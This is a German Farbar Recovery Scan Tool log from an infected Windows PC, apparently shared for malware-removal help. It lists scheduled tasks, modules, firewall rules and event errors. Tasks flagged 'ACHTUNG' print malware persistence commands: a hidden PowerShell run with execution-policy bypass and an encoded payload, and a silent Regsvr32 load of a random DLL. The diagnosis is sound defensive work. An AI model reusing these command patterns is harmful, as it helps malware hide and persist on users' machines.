(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {953B092A-5EBD-4F94-9C6E-512C12B3CF5F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {D0B3A7DD-92A8-4BED-A5BF-74245B8AE768} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {D0E80393-B234-4921-839B-C39706BBDD5F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEABCBF8-4763-43D1-883B-86C80CB16A79} - System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (Der Dateneintrag hat 9732 mehr Zeichen). <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen ============================= (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll 2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl 2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl 2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl 2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl 2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe 2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe 2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe 2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll 2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll 2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program 
Files\AMD\CNext\CNext\libGLESv2.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe 2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe 2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe 2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui 2017-05-03 17:02 - 2017-05-03 17:03 - 01710080 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\HxMail.exe 2017-05-03 17:02 - 2017-05-03 17:03 - 13358272 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Core.dll 2017-05-03 17:02 - 2017-05-03 17:03 - 01200840 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Word.dll 2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-03-14 00:20 - 2012-08-23 11:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll 2017-03-14 00:20 - 2014-05-13 13:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl 2017-03-14 00:20 - 2014-05-13 13:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl 2017-03-14 00:20 - 2014-05-13 13:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl 2017-03-14 00:20 - 2012-04-03 18:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll 2017-05-07 17:13 - 2017-05-17 21:21 - 00034448 _____ () C:\Program Files 
(x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll 2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll 2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll 2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll 2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll 2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll 2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll 2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll 2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll 2015-04-25 07:20 - 
2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll 2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll 2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll 2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2013-08-22 15:25 - 2017-05-19 13:51 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) 
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png DNS Servers: 82.163.143.157 - 82.163.142.159 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{83AD83AC-5138-49A1-AFE6-642DD681957A}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{9F1EF34D-804D-4346-AA62-2A72FA0FBF6F}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{BDC0A943-FFD9-4C31-97CB-2F5C6223930F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{6208BE91-3EEB-4FD5-A9F6-AAF6B8B6DAD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{BDBD0D1C-E183-400A-95C5-7EC28883BDC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{B0EFBE9B-6683-4F5E-B370-26BC5FBB1834}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{B390EB1F-B557-4043-8E63-554A25E1FFA8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Ghost Recon Wildlands Beta\GRW.exe FirewallRules: [{4CE2A673-3091-4652-A0F4-EC8E65F46CDC}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division PTS\TheDivision.exe FirewallRules: [{A8417FA2-B44F-4117-8D45-30BCFD8686E6}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe FirewallRules: [{100496F8-41F8-47A3-85DD-5D420F581AEB}] => (Allow) 
D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe FirewallRules: [UDP Query User{2E4F3652-EFD6-4881-9213-8EA61F89A46F}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe FirewallRules: [TCP Query User{88C41D9B-BB60-4F64-BC68-6DAB1AF7FB31}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe FirewallRules: [UDP Query User{47CE1527-A9E5-4FA6-8A51-6B1E508DD7AC}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe FirewallRules: [TCP Query User{13A38046-9894-492B-9138-E3CF3B213870}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe FirewallRules: [{99E199FA-1006-4A25-8A08-E28651356CDF}] => (Allow) D:\Programme\Ubisoft\Anno 2205\Bin\Win64\Anno2205.exe FirewallRules: [{F3A38691-4442-4EAC-B3E6-B9767F22C203}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe FirewallRules: [{A15E195A-CCA8-4C1D-84C5-546BF8AAE637}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe FirewallRules: [TCP Query User{A6300EE9-EEE9-43B8-B529-D238E94D113B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{35161E84-F39F-429F-8D6F-A6CFC8EC13DF}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [{9CE73BB9-D886-4EA9-9EDD-54D04E01DB68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{C60179E6-4096-438F-A0AE-D7E540CE18C9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{A5BC860D-355B-4935-99F7-09C0A701AAAA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: 
[{62A800D2-8909-45FC-BFD5-612EF096C6F1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{24A88AFE-6316-461C-984E-4AF8F05FCC96}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{FF456D46-8990-4A73-82F7-4A5484372E42}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{CCDDE9C4-05CA-48D1-90C8-2D615BC7B643}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe FirewallRules: [{607A7BED-54D2-4F98-B9A6-4F5D91E07585}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe FirewallRules: [{DBABDDB1-A8F5-4509-A5A6-1A9F0EF2F69D}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe FirewallRules: [{66B9313C-1DF5-470C-B1BD-9064863CA77A}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe FirewallRules: [{38C3B3D0-D3E0-4BB2-8D00-595270146FE7}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe FirewallRules: [{71C075D1-31A5-4E48-B456-75C0CC247DA6}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe FirewallRules: [{859B27CC-891C-45EC-8310-BCCAAC722A85}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe FirewallRules: [{FC73742C-58EE-43B8-B2E2-0755BDB79FAB}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe FirewallRules: [TCP Query User{D780C36A-DADD-4902-950C-1B44C2B4591C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{6BF43327-BDB7-4AB4-898E-8A25BE985091}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [{3F0F651B-1103-4AE2-9098-9BCC4F26404D}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe FirewallRules: [{203174F0-92DD-4D57-B97E-47C4CAC797B9}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe 
FirewallRules: [TCP Query User{DAB2A3D3-0749-4FBF-BA46-7878A1B608DF}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe FirewallRules: [UDP Query User{2538DCE0-9E21-47AC-8348-A452790F29F9}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe FirewallRules: [{51A9B374-5A57-46AB-A962-C889763A43AD}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe FirewallRules: [{67DCCF13-0AEA-4A47-8084-823442F272BB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe FirewallRules: [{300F8BBD-78E2-41E0-8EC4-16DF8E59E651}] => (Allow) D:\Programme\Ubisoft\Anno4.exe FirewallRules: [{C5360BE6-1303-4A0E-8023-CC62F60B1E04}] => (Allow) D:\Programme\Ubisoft\Anno4.exe FirewallRules: [{9274C44A-8563-4D10-AD7B-8DF46B5A8A84}] => (Allow) D:\Programme\Ubisoft\Addon.exe FirewallRules: [{FC814241-9258-4F19-AF41-DB88E23957C1}] => (Allow) D:\Programme\Ubisoft\Addon.exe FirewallRules: [{0B9C568A-9F54-4F5F-8A13-29E3E60DFD10}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe FirewallRules: [{0A57F8DB-B618-48DA-A350-95E445171171}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe FirewallRules: [{B609DA77-EEAE-4331-AF04-D6B0B12DD462}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe FirewallRules: [{7F026620-DD5A-46CF-A2A1-E22FB29A9F0F}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe FirewallRules: [{6207A230-EB6A-4610-B892-DF526C5DA9CB}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe FirewallRules: [{6413A299-3AE2-4728-8D88-DBC7F4693304}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe FirewallRules: [{8395ECDA-6B23-440A-961A-1338B31E9BCF}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe FirewallRules: [{F954F9EC-FC53-42E6-8C62-5FAAB7F337F6}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe FirewallRules: [{E6D4C42C-CFAE-433E-A5C8-75DD628070A2}] => (Allow) 
D:\Programme\Ubisoft\Anno 1404\Addon.exe FirewallRules: [{DA17C889-BA52-4AEA-B1F7-56B213754083}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe FirewallRules: [{B064A02F-82D3-46C7-BE5E-4847D6F8F3DD}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe FirewallRules: [{46A60120-A927-4D76-888D-6D7D4D4928C8}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe FirewallRules: [{614BDF81-34E7-4EF0-AF9D-124919FC7689}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe FirewallRules: [{D83D6FE6-C127-45CA-9089-CB5A015F1059}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe FirewallRules: [{8C525B9B-2F76-4D2A-88BF-33045C4BF9F4}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe FirewallRules: [{8170164A-B9FD-4092-A573-9EEFE3E8D466}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe FirewallRules: [TCP Query User{D3C7FE0D-703D-47B1-8FA2-AB9592BF1E7B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{6BF3876D-F5A1-4D45-B983-F240E0C30606}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [{3495CC5B-8440-473C-99FE-BB14A3B532D1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service ==================== Wiederherstellungspunkte 
========================= 07-05-2017 23:26:13 Windows Update 12-05-2017 20:27:56 Windows Update 17-05-2017 21:17:54 Windows Update 19-05-2017 14:17:08 Revo Uninstaller's restore point - Freelancer 19-05-2017 14:19:32 Revo Uninstaller's restore point - Microsoft Office Professional Plus 2013 19-05-2017 14:19:39 Removed Microsoft Office Professional Plus 2013 19-05-2017 14:19:44 PROPLUS ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (05/19/2017 02:17:08 PM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471} Error: (05/19/2017 01:54:27 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/19/2017 01:54:14 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. 
